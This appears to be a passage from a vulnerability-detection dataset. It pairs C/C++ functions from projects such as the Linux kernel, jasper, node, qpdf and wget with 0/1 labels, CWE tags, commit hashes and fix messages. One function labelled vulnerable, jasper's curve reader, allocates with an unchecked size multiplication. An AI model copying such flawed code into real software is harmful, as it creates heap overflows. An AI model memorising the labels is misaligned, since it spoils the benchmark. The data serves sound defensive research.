[2] http://lkml.kernel.org/r/CAM_iQpWuPVGc2ky8M-9yukECtS+zKjiDasNymX7rMcBjBFyM_A@mail.gmail.com
[3] commit db73ee0d46379922 ("mm, vmscan: do not loop on too_many_isolated for ever"))
Link: http://lkml.kernel.org/r/1509017339-4802-1-git-send-email-penguin-kernel@I-love.SAKURA.ne.jp
Signed-off-by: Tetsuo Handa <[email protected]>
Reported-by: Cong Wang <[email protected]>
Reported-by: yuwang.yuwang <[email protected]>
Reported-by: Johannes Weiner <[email protected]>
Acked-by: Michal Hocko <[email protected]>
Acked-by: Johannes Weiner <[email protected]>
Cc: Vlastimil Babka <[email protected]>
Cc: Mel Gorman <[email protected]>
Cc: Dave Hansen <[email protected]>
Cc: Sergey Senozhatsky <[email protected]>
Cc: Petr Mladek <[email protected]>
Cc: Steven Rostedt <[email protected]>
Signed-off-by: Andrew Morton <[email protected]>
Signed-off-by: Linus Torvalds <[email protected]>
|
static loff_t fuse_file_llseek(struct file *file, loff_t offset, int whence)
{
loff_t retval;
struct inode *inode = file_inode(file);
/* No i_mutex protection necessary for SEEK_CUR and SEEK_SET */
if (whence == SEEK_CUR || whence == SEEK_SET)
return generic_file_llseek(file, offset, whence);
mutex_lock(&inode->i_mutex);
retval = fuse_update_attributes(inode, NULL, file, NULL);
if (!retval)
retval = generic_file_llseek(file, offset, whence);
mutex_unlock(&inode->i_mutex);
return retval;
}
| 0 |
[
"CWE-399",
"CWE-835"
] |
linux
|
3ca8138f014a913f98e6ef40e939868e1e9ea876
| 32,531,486,765,553,454,000,000,000,000,000,000,000 | 17 |
fuse: break infinite loop in fuse_fill_write_pages()
I got a report about an unkillable task eating CPU. Further
investigation shows that the problem is in the fuse_fill_write_pages()
function. If the iov's first segment has zero length, we get an infinite
loop, because we never reach the iov_iter_advance() call.
Fix this by calling iov_iter_advance() before repeating an attempt to
copy data from userspace.
A similar problem is described in 124d3b7041f ("fix writev regression:
pan hanging unkillable and un-straceable"). If a zero-length segment
is followed by a segment with an invalid address,
iov_iter_fault_in_readable() checks only the first segment (zero-length),
iov_iter_copy_from_user_atomic() skips it, fails at the second and
returns zero -> goto again without skipping the zero-length segment.
The patch calls iov_iter_advance() before goto again: we'll skip the zero-length
segment at the second iteration and iov_iter_fault_in_readable() will detect
invalid address.
Special thanks to Konstantin Khlebnikov, who helped a lot with the commit
description.
Cc: Andrew Morton <[email protected]>
Cc: Maxim Patlasov <[email protected]>
Cc: Konstantin Khlebnikov <[email protected]>
Signed-off-by: Roman Gushchin <[email protected]>
Signed-off-by: Miklos Szeredi <[email protected]>
Fixes: ea9b9907b82a ("fuse: implement perform_write")
Cc: <[email protected]>
|
static int ext4_do_update_inode(handle_t *handle,
struct inode *inode,
struct ext4_iloc *iloc)
{
struct ext4_inode *raw_inode = ext4_raw_inode(iloc);
struct ext4_inode_info *ei = EXT4_I(inode);
struct buffer_head *bh = iloc->bh;
struct super_block *sb = inode->i_sb;
int err = 0, rc, block;
int need_datasync = 0, set_large_file = 0;
uid_t i_uid;
gid_t i_gid;
projid_t i_projid;
spin_lock(&ei->i_raw_lock);
/* For fields not tracked in the in-memory inode,
* initialise them to zero for new inodes. */
if (ext4_test_inode_state(inode, EXT4_STATE_NEW))
memset(raw_inode, 0, EXT4_SB(inode->i_sb)->s_inode_size);
raw_inode->i_mode = cpu_to_le16(inode->i_mode);
i_uid = i_uid_read(inode);
i_gid = i_gid_read(inode);
i_projid = from_kprojid(&init_user_ns, ei->i_projid);
if (!(test_opt(inode->i_sb, NO_UID32))) {
raw_inode->i_uid_low = cpu_to_le16(low_16_bits(i_uid));
raw_inode->i_gid_low = cpu_to_le16(low_16_bits(i_gid));
/*
* Fix up interoperability with old kernels. Otherwise, old inodes get
* re-used with the upper 16 bits of the uid/gid intact
*/
if (ei->i_dtime && list_empty(&ei->i_orphan)) {
raw_inode->i_uid_high = 0;
raw_inode->i_gid_high = 0;
} else {
raw_inode->i_uid_high =
cpu_to_le16(high_16_bits(i_uid));
raw_inode->i_gid_high =
cpu_to_le16(high_16_bits(i_gid));
}
} else {
raw_inode->i_uid_low = cpu_to_le16(fs_high2lowuid(i_uid));
raw_inode->i_gid_low = cpu_to_le16(fs_high2lowgid(i_gid));
raw_inode->i_uid_high = 0;
raw_inode->i_gid_high = 0;
}
raw_inode->i_links_count = cpu_to_le16(inode->i_nlink);
EXT4_INODE_SET_XTIME(i_ctime, inode, raw_inode);
EXT4_INODE_SET_XTIME(i_mtime, inode, raw_inode);
EXT4_INODE_SET_XTIME(i_atime, inode, raw_inode);
EXT4_EINODE_SET_XTIME(i_crtime, ei, raw_inode);
err = ext4_inode_blocks_set(handle, raw_inode, ei);
if (err) {
spin_unlock(&ei->i_raw_lock);
goto out_brelse;
}
raw_inode->i_dtime = cpu_to_le32(ei->i_dtime);
raw_inode->i_flags = cpu_to_le32(ei->i_flags & 0xFFFFFFFF);
if (likely(!test_opt2(inode->i_sb, HURD_COMPAT)))
raw_inode->i_file_acl_high =
cpu_to_le16(ei->i_file_acl >> 32);
raw_inode->i_file_acl_lo = cpu_to_le32(ei->i_file_acl);
if (ei->i_disksize != ext4_isize(inode->i_sb, raw_inode)) {
ext4_isize_set(raw_inode, ei->i_disksize);
need_datasync = 1;
}
if (ei->i_disksize > 0x7fffffffULL) {
if (!ext4_has_feature_large_file(sb) ||
EXT4_SB(sb)->s_es->s_rev_level ==
cpu_to_le32(EXT4_GOOD_OLD_REV))
set_large_file = 1;
}
raw_inode->i_generation = cpu_to_le32(inode->i_generation);
if (S_ISCHR(inode->i_mode) || S_ISBLK(inode->i_mode)) {
if (old_valid_dev(inode->i_rdev)) {
raw_inode->i_block[0] =
cpu_to_le32(old_encode_dev(inode->i_rdev));
raw_inode->i_block[1] = 0;
} else {
raw_inode->i_block[0] = 0;
raw_inode->i_block[1] =
cpu_to_le32(new_encode_dev(inode->i_rdev));
raw_inode->i_block[2] = 0;
}
} else if (!ext4_has_inline_data(inode)) {
for (block = 0; block < EXT4_N_BLOCKS; block++)
raw_inode->i_block[block] = ei->i_data[block];
}
if (likely(!test_opt2(inode->i_sb, HURD_COMPAT))) {
u64 ivers = ext4_inode_peek_iversion(inode);
raw_inode->i_disk_version = cpu_to_le32(ivers);
if (ei->i_extra_isize) {
if (EXT4_FITS_IN_INODE(raw_inode, ei, i_version_hi))
raw_inode->i_version_hi =
cpu_to_le32(ivers >> 32);
raw_inode->i_extra_isize =
cpu_to_le16(ei->i_extra_isize);
}
}
BUG_ON(!ext4_has_feature_project(inode->i_sb) &&
i_projid != EXT4_DEF_PROJID);
if (EXT4_INODE_SIZE(inode->i_sb) > EXT4_GOOD_OLD_INODE_SIZE &&
EXT4_FITS_IN_INODE(raw_inode, ei, i_projid))
raw_inode->i_projid = cpu_to_le32(i_projid);
ext4_inode_csum_set(inode, raw_inode, ei);
spin_unlock(&ei->i_raw_lock);
if (inode->i_sb->s_flags & SB_LAZYTIME)
ext4_update_other_inodes_time(inode->i_sb, inode->i_ino,
bh->b_data);
BUFFER_TRACE(bh, "call ext4_handle_dirty_metadata");
rc = ext4_handle_dirty_metadata(handle, NULL, bh);
if (!err)
err = rc;
ext4_clear_inode_state(inode, EXT4_STATE_NEW);
if (set_large_file) {
BUFFER_TRACE(EXT4_SB(sb)->s_sbh, "get write access");
err = ext4_journal_get_write_access(handle, EXT4_SB(sb)->s_sbh);
if (err)
goto out_brelse;
ext4_update_dynamic_rev(sb);
ext4_set_feature_large_file(sb);
ext4_handle_sync(handle);
err = ext4_handle_dirty_super(handle, sb);
}
ext4_update_inode_fsync_trans(handle, inode, need_datasync);
out_brelse:
brelse(bh);
ext4_std_error(inode->i_sb, err);
return err;
}
| 0 |
[
"CWE-416"
] |
linux
|
eb9b5f01c33adebc31cbc236c02695f605b0e417
| 130,423,449,155,567,820,000,000,000,000,000,000,000 | 139 |
ext4: bubble errors from ext4_find_inline_data_nolock() up to ext4_iget()
If ext4_find_inline_data_nolock() returns an error it needs to get
reflected up to ext4_iget(). In order to fix this,
ext4_iget_extra_inode() needs to return an error (and not return
void).
This is related to "ext4: do not allow external inodes for inline
data" (which fixes CVE-2018-11412) in that in the errors=continue
case, it would be useful for userspace to receive an error
indicating that the file system is corrupted.
Signed-off-by: Theodore Ts'o <[email protected]>
Reviewed-by: Andreas Dilger <[email protected]>
Cc: [email protected]
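Generic sketch of the shape of the change (hypothetical names, not ext4 internals): the helper that used to return void now returns an error code, and the caller bubbles it up instead of continuing with data it could not parse.
#include <errno.h>
#include <stddef.h>

/* Formerly "void read_extra(...)": now any parse failure is reported. */
static int read_extra(const unsigned char *buf, size_t len, unsigned int *out)
{
    if (len < 4)
        return -EINVAL;                       /* truncated / corrupted input */
    *out = (unsigned int)buf[0]
         | ((unsigned int)buf[1] << 8)
         | ((unsigned int)buf[2] << 16)
         | ((unsigned int)buf[3] << 24);
    return 0;
}

static int load_inode_extra(const unsigned char *buf, size_t len,
                            unsigned int *out)
{
    int err = read_extra(buf, len, out);
    if (err)
        return err;                           /* bubble the error up */
    return 0;
}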
|
void gf_net_set_ntp_shift(s32 shift)
{
ntp_shift = GF_NTP_SEC_1900_TO_1970 + shift;
}
| 0 |
[
"CWE-787"
] |
gpac
|
f3698bb1bce62402805c3fda96551a23101a32f9
| 327,631,945,152,168,330,000,000,000,000,000,000,000 | 4 |
fix buffer overrun in gf_bin128_parse
closes #1204
closes #1205
|
void Init(const char* syscall,
const char* data,
size_t len,
enum encoding encoding) {
syscall_ = syscall;
encoding_ = encoding;
if (data != nullptr) {
CHECK(!has_data_);
buffer_.AllocateSufficientStorage(len + 1);
buffer_.SetLengthAndZeroTerminate(len);
memcpy(*buffer_, data, len);
has_data_ = true;
}
}
| 0 |
[
"CWE-416"
] |
node
|
7f178663ebffc82c9f8a5a1b6bf2da0c263a30ed
| 337,057,958,514,175,850,000,000,000,000,000,000,000 | 15 |
src: use unique_ptr for WriteWrap
This commit attempts to avoid a use-after-free error by using unique_ptr
and passing a reference to it.
CVE-ID: CVE-2020-8265
Fixes: https://github.com/nodejs-private/node-private/issues/227
PR-URL: https://github.com/nodejs-private/node-private/pull/238
Reviewed-By: Michael Dawson <[email protected]>
Reviewed-By: Tobias Nießen <[email protected]>
Reviewed-By: Richard Lau <[email protected]>
|
void http2OptionsFromTuple(envoy::config::core::v3::Http2ProtocolOptions& options,
const absl::optional<const Http2SettingsTuple>& tp) {
options.mutable_hpack_table_size()->set_value(
(tp.has_value()) ? ::testing::get<SettingsTupleIndex::HpackTableSize>(*tp)
: CommonUtility::OptionsLimits::DEFAULT_HPACK_TABLE_SIZE);
options.mutable_max_concurrent_streams()->set_value(
(tp.has_value()) ? ::testing::get<SettingsTupleIndex::MaxConcurrentStreams>(*tp)
: CommonUtility::OptionsLimits::DEFAULT_MAX_CONCURRENT_STREAMS);
options.mutable_initial_stream_window_size()->set_value(
(tp.has_value()) ? ::testing::get<SettingsTupleIndex::InitialStreamWindowSize>(*tp)
: CommonUtility::OptionsLimits::DEFAULT_INITIAL_STREAM_WINDOW_SIZE);
options.mutable_initial_connection_window_size()->set_value(
(tp.has_value()) ? ::testing::get<SettingsTupleIndex::InitialConnectionWindowSize>(*tp)
: CommonUtility::OptionsLimits::DEFAULT_INITIAL_CONNECTION_WINDOW_SIZE);
options.set_allow_metadata(allow_metadata_);
options.set_stream_error_on_invalid_http_messaging(stream_error_on_invalid_http_messaging_);
options.mutable_max_outbound_frames()->set_value(max_outbound_frames_);
options.mutable_max_outbound_control_frames()->set_value(max_outbound_control_frames_);
options.mutable_max_consecutive_inbound_frames_with_empty_payload()->set_value(
max_consecutive_inbound_frames_with_empty_payload_);
options.mutable_max_inbound_priority_frames_per_stream()->set_value(
max_inbound_priority_frames_per_stream_);
options.mutable_max_inbound_window_update_frames_per_data_frame_sent()->set_value(
max_inbound_window_update_frames_per_data_frame_sent_);
}
| 0 |
[
"CWE-400"
] |
envoy
|
0e49a495826ea9e29134c1bd54fdeb31a034f40c
| 14,948,553,196,945,226,000,000,000,000,000,000,000 | 25 |
http/2: add stats and stream flush timeout (#139)
This commit adds a new stream flush timeout to guard against a
remote server that does not open window once an entire stream has
been buffered for flushing. Additional stats have also been added
to better understand the codecs view of active streams as well as
amount of data buffered.
Signed-off-by: Matt Klein <[email protected]>
|
static bool create_db_dir(char *fnam)
{
int ret;
char *p;
size_t len;
len = strlen(fnam);
p = alloca(len + 1);
(void)strlcpy(p, fnam, len + 1);
fnam = p;
p = p + 1;
again:
while (*p && *p != '/')
p++;
if (!*p)
return true;
*p = '\0';
ret = mkdir(fnam, 0755);
if (ret < 0 && errno != EEXIST) {
usernic_error("Failed to create %s: %s\n", fnam,
strerror(errno));
*p = '/';
return false;
}
*(p++) = '/';
goto again;
}
| 0 |
[
"CWE-417"
] |
lxc
|
c1cf54ebf251fdbad1e971679614e81649f1c032
| 337,792,692,931,540,820,000,000,000,000,000,000,000 | 31 |
CVE 2018-6556: verify netns fd in lxc-user-nic
Signed-off-by: Christian Brauner <[email protected]>
|
QPDF::writeHPageOffset(BitWriter& w)
{
HPageOffset& t = this->m->page_offset_hints;
w.writeBitsInt(t.min_nobjects, 32); // 1
w.writeBitsInt(toI(t.first_page_offset), 32); // 2
w.writeBitsInt(t.nbits_delta_nobjects, 16); // 3
w.writeBitsInt(t.min_page_length, 32); // 4
w.writeBitsInt(t.nbits_delta_page_length, 16); // 5
w.writeBitsInt(t.min_content_offset, 32); // 6
w.writeBitsInt(t.nbits_delta_content_offset, 16); // 7
w.writeBitsInt(t.min_content_length, 32); // 8
w.writeBitsInt(t.nbits_delta_content_length, 16); // 9
w.writeBitsInt(t.nbits_nshared_objects, 16); // 10
w.writeBitsInt(t.nbits_shared_identifier, 16); // 11
w.writeBitsInt(t.nbits_shared_numerator, 16); // 12
w.writeBitsInt(t.shared_denominator, 16); // 13
int nitems = toI(getAllPages().size());
std::vector<HPageOffsetEntry>& entries = t.entries;
write_vector_int(w, nitems, entries,
t.nbits_delta_nobjects,
&HPageOffsetEntry::delta_nobjects);
write_vector_int(w, nitems, entries,
t.nbits_delta_page_length,
&HPageOffsetEntry::delta_page_length);
write_vector_int(w, nitems, entries,
t.nbits_nshared_objects,
&HPageOffsetEntry::nshared_objects);
write_vector_vector(w, nitems, entries,
&HPageOffsetEntry::nshared_objects,
t.nbits_shared_identifier,
&HPageOffsetEntry::shared_identifiers);
write_vector_vector(w, nitems, entries,
&HPageOffsetEntry::nshared_objects,
t.nbits_shared_numerator,
&HPageOffsetEntry::shared_numerators);
write_vector_int(w, nitems, entries,
t.nbits_delta_content_offset,
&HPageOffsetEntry::delta_content_offset);
write_vector_int(w, nitems, entries,
t.nbits_delta_content_length,
&HPageOffsetEntry::delta_content_length);
}
| 0 |
[
"CWE-787"
] |
qpdf
|
d71f05ca07eb5c7cfa4d6d23e5c1f2a800f52e8e
| 326,101,661,557,597,850,000,000,000,000,000,000,000 | 45 |
Fix sign and conversion warnings (major)
This makes all integer type conversions that have potential data loss
explicit with calls that do range checks and raise an exception. After
this commit, qpdf builds with no warnings when -Wsign-conversion
-Wconversion is used with gcc or clang or when -W3 -Wd4800 is used
with MSVC. This significantly reduces the likelihood of potential
crashes from bogus integer values.
There are some parts of the code that take int when they should take
size_t or an offset. Such places would make qpdf not support files
with more than 2^31 of something that usually wouldn't be so large. In
the event that such a file shows up and is valid, at least qpdf would
raise an error in the right spot so the issue could be legitimately
addressed rather than failing in some weird way because of a silent
overflow condition.
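In C (the document's main language; qpdf itself uses C++ and throws an exception), the same range-checked conversion idea might look like:
#include <errno.h>
#include <limits.h>
#include <stddef.h>

/* Narrow a size_t to int only if the value fits; otherwise report ERANGE
   instead of letting an implicit conversion silently truncate. */
static int size_to_int(size_t v, int *out)
{
    if (v > (size_t)INT_MAX)
        return -ERANGE;
    *out = (int)v;
    return 0;
}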
|
static void esp_fifo_push(Fifo8 *fifo, uint8_t val)
{
if (fifo8_num_used(fifo) == fifo->capacity) {
trace_esp_error_fifo_overrun();
return;
}
fifo8_push(fifo, val);
}
| 0 |
[
"CWE-476"
] |
qemu
|
e5455b8c1c6170c788f3c0fd577cc3be53539a99
| 108,517,159,262,597,100,000,000,000,000,000,000,000 | 9 |
esp: consolidate esp_cmdfifo_push() into esp_fifo_push()
Each FIFO currently has its own push functions with the only difference being
the capacity check. The original reason for this was that the fifo8
implementation doesn't have a formal API for retrieving the FIFO capacity;
however, there are multiple examples within QEMU where the capacity field is
accessed directly.
Change esp_fifo_push() to access the FIFO capacity directly and then consolidate
esp_cmdfifo_push() into esp_fifo_push().
Signed-off-by: Mark Cave-Ayland <[email protected]>
Reviewed-by: Philippe Mathieu-Daudé <[email protected]>
Tested-by: Alexander Bulekov <[email protected]>
Message-Id: <[email protected]>
|
static int jas_icccurv_input(jas_iccattrval_t *attrval, jas_stream_t *in,
int cnt)
{
jas_icccurv_t *curv = &attrval->data.curv;
unsigned int i;
curv->numents = 0;
curv->ents = 0;
if (jas_iccgetuint32(in, &curv->numents))
goto error;
if (!(curv->ents = jas_malloc(curv->numents * sizeof(jas_iccuint16_t))))
goto error;
for (i = 0; i < curv->numents; ++i) {
if (jas_iccgetuint16(in, &curv->ents[i]))
goto error;
}
if (JAS_CAST(int, 4 + 2 * curv->numents) != cnt)
goto error;
return 0;
error:
jas_icccurv_destroy(attrval);
return -1;
}
| 1 |
[
"CWE-189"
] |
jasper
|
3c55b399c36ef46befcb21e4ebc4799367f89684
| 60,058,086,348,133,480,000,000,000,000,000,000,000 | 26 |
At many places in the code, jas_malloc or jas_recalloc was being
invoked with the size argument being computed in a manner that would not
allow integer overflow to be detected. Now, these places in the code
have been modified to use special-purpose memory allocation functions
(e.g., jas_alloc2, jas_alloc3, jas_realloc2) that check for overflow.
This should fix many security problems.
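A hedged sketch of such an overflow-checking allocator (in the spirit of jas_alloc2, not its exact definition):
#include <stdint.h>
#include <stdlib.h>

/* Like malloc(n * size), but fails cleanly if the multiplication would wrap. */
static void *alloc2(size_t n, size_t size)
{
    if (size != 0 && n > SIZE_MAX / size)
        return NULL;
    return malloc(n * size);
}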
|
smtp_proceed_connected(struct smtp_session *s)
{
if (s->listener->flags & F_SMTPS)
smtp_cert_init(s);
else
smtp_send_banner(s);
}
| 0 |
[
"CWE-78",
"CWE-252"
] |
src
|
9dcfda045474d8903224d175907bfc29761dcb45
| 24,708,195,817,065,332,000,000,000,000,000,000,000 | 7 |
Fix a security vulnerability discovered by Qualys which can lead to a
privilege escalation on mbox deliveries and unprivileged code execution
on lmtp deliveries, due to a logic issue causing a sanity check to be
missed.
ok eric@, millert@
|
static void nfs4_recovery_handle_error(struct nfs_client *clp, int error)
{
switch (error) {
case -NFS4ERR_CB_PATH_DOWN:
nfs_handle_cb_pathdown(clp);
break;
case -NFS4ERR_STALE_CLIENTID:
case -NFS4ERR_LEASE_MOVED:
set_bit(NFS4CLNT_LEASE_EXPIRED, &clp->cl_state);
nfs4_state_start_reclaim_reboot(clp);
break;
case -NFS4ERR_EXPIRED:
set_bit(NFS4CLNT_LEASE_EXPIRED, &clp->cl_state);
nfs4_state_start_reclaim_nograce(clp);
}
}
| 0 |
[
"CWE-703"
] |
linux
|
dc0b027dfadfcb8a5504f7d8052754bf8d501ab9
| 14,614,983,781,805,120,000,000,000,000,000,000,000 | 16 |
NFSv4: Convert the open and close ops to use fmode
Signed-off-by: Trond Myklebust <[email protected]>
|
PHP_FUNCTION(imagesx)
{
zval *IM;
gdImagePtr im;
if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "r", &IM) == FAILURE) {
return;
}
ZEND_FETCH_RESOURCE(im, gdImagePtr, &IM, -1, "Image", le_gd);
RETURN_LONG(gdImageSX(im));
}
| 0 |
[
"CWE-703",
"CWE-189"
] |
php-src
|
2938329ce19cb8c4197dec146c3ec887c6f61d01
| 101,412,428,770,624,070,000,000,000,000,000,000,000 | 13 |
Fixed bug #66356 (Heap Overflow Vulnerability in imagecrop())
And also fixed the bug: arguments are altered after some calls
|
gethttp (const struct url *u, struct url *original_url, struct http_stat *hs,
int *dt, struct url *proxy, struct iri *iri, int count)
{
struct request *req = NULL;
char *type = NULL;
char *user, *passwd;
char *proxyauth;
int statcode;
int write_error;
wgint contlen, contrange;
const struct url *conn;
FILE *fp;
int err;
uerr_t retval;
#ifdef HAVE_HSTS
#ifdef TESTING
/* we don't link against main.o when we're testing */
hsts_store_t hsts_store = NULL;
#else
extern hsts_store_t hsts_store;
#endif
const char *hsts_params;
time_t max_age;
bool include_subdomains;
#endif
int sock = -1;
/* Set to 1 when the authorization has already been sent and should
not be tried again. */
bool auth_finished = false;
/* Set to 1 when just globally-set Basic authorization has been sent;
* should prevent further Basic negotiations, but not other
* mechanisms. */
bool basic_auth_finished = false;
/* Whether NTLM authentication is used for this request. */
bool ntlm_seen = false;
/* Whether our connection to the remote host is through SSL. */
bool using_ssl = false;
/* Whether a HEAD request will be issued (as opposed to GET or
POST). */
bool head_only = !!(*dt & HEAD_ONLY);
/* Whether conditional get request will be issued. */
bool cond_get = !!(*dt & IF_MODIFIED_SINCE);
#ifdef HAVE_METALINK
/* Are we looking for metalink info in HTTP headers? */
bool metalink = !!(*dt & METALINK_METADATA);
#endif
char *head = NULL;
struct response *resp = NULL;
char hdrval[512];
char *message = NULL;
/* Declare WARC variables. */
bool warc_enabled = (opt.warc_filename != NULL);
FILE *warc_tmp = NULL;
char warc_timestamp_str [21];
char warc_request_uuid [48];
ip_address *warc_ip = NULL;
off_t warc_payload_offset = -1;
/* Whether this connection will be kept alive after the HTTP request
is done. */
bool keep_alive;
/* Is the server using the chunked transfer encoding? */
bool chunked_transfer_encoding = false;
/* Whether keep-alive should be inhibited. */
bool inhibit_keep_alive =
!opt.http_keep_alive || opt.ignore_length;
/* Headers sent when using POST. */
wgint body_data_size = 0;
#ifdef HAVE_SSL
if (u->scheme == SCHEME_HTTPS)
{
/* Initialize the SSL context. After this has once been done,
it becomes a no-op. */
if (!ssl_init ())
{
scheme_disable (SCHEME_HTTPS);
logprintf (LOG_NOTQUIET,
_("Disabling SSL due to encountered errors.\n"));
retval = SSLINITFAILED;
goto cleanup;
}
}
#endif /* HAVE_SSL */
/* Initialize certain elements of struct http_stat. */
hs->len = 0;
hs->contlen = -1;
hs->res = -1;
hs->rderrmsg = NULL;
hs->newloc = NULL;
xfree (hs->remote_time);
hs->error = NULL;
hs->message = NULL;
hs->local_encoding = ENC_NONE;
hs->remote_encoding = ENC_NONE;
conn = u;
{
uerr_t ret;
req = initialize_request (u, hs, dt, proxy, inhibit_keep_alive,
&basic_auth_finished, &body_data_size,
&user, &passwd, &ret);
if (req == NULL)
{
retval = ret;
goto cleanup;
}
}
retry_with_auth:
/* We need to come back here when the initial attempt to retrieve
without authorization header fails. (Expected to happen at least
for the Digest authorization scheme.) */
if (opt.cookies)
request_set_header (req, "Cookie",
cookie_header (wget_cookie_jar,
u->host, u->port, u->path,
#ifdef HAVE_SSL
u->scheme == SCHEME_HTTPS
#else
0
#endif
),
rel_value);
/* Add the user headers. */
if (opt.user_headers)
{
int i;
for (i = 0; opt.user_headers[i]; i++)
request_set_user_header (req, opt.user_headers[i]);
}
proxyauth = NULL;
if (proxy)
{
conn = proxy;
initialize_proxy_configuration (u, req, proxy, &proxyauth);
}
keep_alive = true;
/* Establish the connection. */
if (inhibit_keep_alive)
keep_alive = false;
{
uerr_t conn_err = establish_connection (u, &conn, hs, proxy, &proxyauth, &req,
&using_ssl, inhibit_keep_alive, &sock);
if (conn_err != RETROK)
{
retval = conn_err;
goto cleanup;
}
}
/* Open the temporary file where we will write the request. */
if (warc_enabled)
{
warc_tmp = warc_tempfile ();
if (warc_tmp == NULL)
{
CLOSE_INVALIDATE (sock);
retval = WARC_TMP_FOPENERR;
goto cleanup;
}
if (! proxy)
{
warc_ip = (ip_address *) alloca (sizeof (ip_address));
socket_ip_address (sock, warc_ip, ENDPOINT_PEER);
}
}
/* Send the request to server. */
write_error = request_send (req, sock, warc_tmp);
if (write_error >= 0)
{
if (opt.body_data)
{
DEBUGP (("[BODY data: %s]\n", opt.body_data));
write_error = fd_write (sock, opt.body_data, body_data_size, -1);
if (write_error >= 0 && warc_tmp != NULL)
{
int warc_tmp_written;
/* Remember end of headers / start of payload. */
warc_payload_offset = ftello (warc_tmp);
/* Write a copy of the data to the WARC record. */
warc_tmp_written = fwrite (opt.body_data, 1, body_data_size, warc_tmp);
if (warc_tmp_written != body_data_size)
write_error = -2;
}
}
else if (opt.body_file && body_data_size != 0)
{
if (warc_tmp != NULL)
/* Remember end of headers / start of payload */
warc_payload_offset = ftello (warc_tmp);
write_error = body_file_send (sock, opt.body_file, body_data_size, warc_tmp);
}
}
if (write_error < 0)
{
CLOSE_INVALIDATE (sock);
if (warc_tmp != NULL)
fclose (warc_tmp);
if (write_error == -2)
retval = WARC_TMP_FWRITEERR;
else
retval = WRITEFAILED;
goto cleanup;
}
logprintf (LOG_VERBOSE, _("%s request sent, awaiting response... "),
proxy ? "Proxy" : "HTTP");
contlen = -1;
contrange = 0;
*dt &= ~RETROKF;
if (warc_enabled)
{
bool warc_result;
/* Generate a timestamp and uuid for this request. */
warc_timestamp (warc_timestamp_str, sizeof (warc_timestamp_str));
warc_uuid_str (warc_request_uuid);
/* Create a request record and store it in the WARC file. */
warc_result = warc_write_request_record (u->url, warc_timestamp_str,
warc_request_uuid, warc_ip,
warc_tmp, warc_payload_offset);
if (! warc_result)
{
CLOSE_INVALIDATE (sock);
retval = WARC_ERR;
goto cleanup;
}
/* warc_write_request_record has also closed warc_tmp. */
}
/* Repeat while we receive a 10x response code. */
{
bool _repeat;
do
{
head = read_http_response_head (sock);
if (!head)
{
if (errno == 0)
{
logputs (LOG_NOTQUIET, _("No data received.\n"));
CLOSE_INVALIDATE (sock);
retval = HEOF;
}
else
{
logprintf (LOG_NOTQUIET, _("Read error (%s) in headers.\n"),
fd_errstr (sock));
CLOSE_INVALIDATE (sock);
retval = HERR;
}
goto cleanup;
}
DEBUGP (("\n---response begin---\n%s---response end---\n", head));
resp = resp_new (head);
/* Check for status line. */
xfree (message);
statcode = resp_status (resp, &message);
if (statcode < 0)
{
char *tms = datetime_str (time (NULL));
logprintf (LOG_VERBOSE, "%d\n", statcode);
logprintf (LOG_NOTQUIET, _("%s ERROR %d: %s.\n"), tms, statcode,
quotearg_style (escape_quoting_style,
_("Malformed status line")));
CLOSE_INVALIDATE (sock);
retval = HERR;
goto cleanup;
}
if (H_10X (statcode))
{
xfree (head);
resp_free (&resp);
_repeat = true;
DEBUGP (("Ignoring response\n"));
}
else
{
_repeat = false;
}
}
while (_repeat);
}
xfree (hs->message);
hs->message = xstrdup (message);
if (!opt.server_response)
logprintf (LOG_VERBOSE, "%2d %s\n", statcode,
message ? quotearg_style (escape_quoting_style, message) : "");
else
{
logprintf (LOG_VERBOSE, "\n");
print_server_response (resp, " ");
}
if (!opt.ignore_length
&& resp_header_copy (resp, "Content-Length", hdrval, sizeof (hdrval)))
{
wgint parsed;
errno = 0;
parsed = str_to_wgint (hdrval, NULL, 10);
if (parsed == WGINT_MAX && errno == ERANGE)
{
/* Out of range.
#### If Content-Length is out of range, it most likely
means that the file is larger than 2G and that we're
compiled without LFS. In that case we should probably
refuse to even attempt to download the file. */
contlen = -1;
}
else if (parsed < 0)
{
/* Negative Content-Length; nonsensical, so we can't
assume any information about the content to receive. */
contlen = -1;
}
else
contlen = parsed;
}
/* Check for keep-alive related responses. */
if (!inhibit_keep_alive)
{
if (resp_header_copy (resp, "Connection", hdrval, sizeof (hdrval)))
{
if (0 == c_strcasecmp (hdrval, "Close"))
keep_alive = false;
}
}
chunked_transfer_encoding = false;
if (resp_header_copy (resp, "Transfer-Encoding", hdrval, sizeof (hdrval))
&& 0 == c_strcasecmp (hdrval, "chunked"))
chunked_transfer_encoding = true;
/* Handle (possibly multiple instances of) the Set-Cookie header. */
if (opt.cookies)
{
int scpos;
const char *scbeg, *scend;
/* The jar should have been created by now. */
assert (wget_cookie_jar != NULL);
for (scpos = 0;
(scpos = resp_header_locate (resp, "Set-Cookie", scpos,
&scbeg, &scend)) != -1;
++scpos)
{
char *set_cookie; BOUNDED_TO_ALLOCA (scbeg, scend, set_cookie);
cookie_handle_set_cookie (wget_cookie_jar, u->host, u->port,
u->path, set_cookie);
}
}
if (keep_alive)
/* The server has promised that it will not close the connection
when we're done. This means that we can register it. */
register_persistent (conn->host, conn->port, sock, using_ssl);
#ifdef HAVE_METALINK
/* We need to check for the Metalink data in the very first response
we get from the server (before redirections, authorization, etc.). */
if (metalink)
{
hs->metalink = metalink_from_http (resp, hs, u);
/* Bugfix: hs->local_file is NULL (opt.content_disposition). */
if (!hs->local_file && hs->metalink && hs->metalink->origin)
hs->local_file = xstrdup (hs->metalink->origin);
xfree (hs->message);
retval = RETR_WITH_METALINK;
CLOSE_FINISH (sock);
goto cleanup;
}
#endif
if (statcode == HTTP_STATUS_UNAUTHORIZED)
{
/* Authorization is required. */
uerr_t auth_err = RETROK;
bool retry;
/* Normally we are not interested in the response body.
But if we are writing a WARC file we are: we like to keep everything. */
if (warc_enabled)
{
int _err;
type = resp_header_strdup (resp, "Content-Type");
_err = read_response_body (hs, sock, NULL, contlen, 0,
chunked_transfer_encoding,
u->url, warc_timestamp_str,
warc_request_uuid, warc_ip, type,
statcode, head);
xfree (type);
if (_err != RETRFINISHED || hs->res < 0)
{
CLOSE_INVALIDATE (sock);
retval = _err;
goto cleanup;
}
else
CLOSE_FINISH (sock);
}
else
{
/* Since WARC is disabled, we are not interested in the response body. */
if (keep_alive && !head_only
&& skip_short_body (sock, contlen, chunked_transfer_encoding))
CLOSE_FINISH (sock);
else
CLOSE_INVALIDATE (sock);
}
pconn.authorized = false;
{
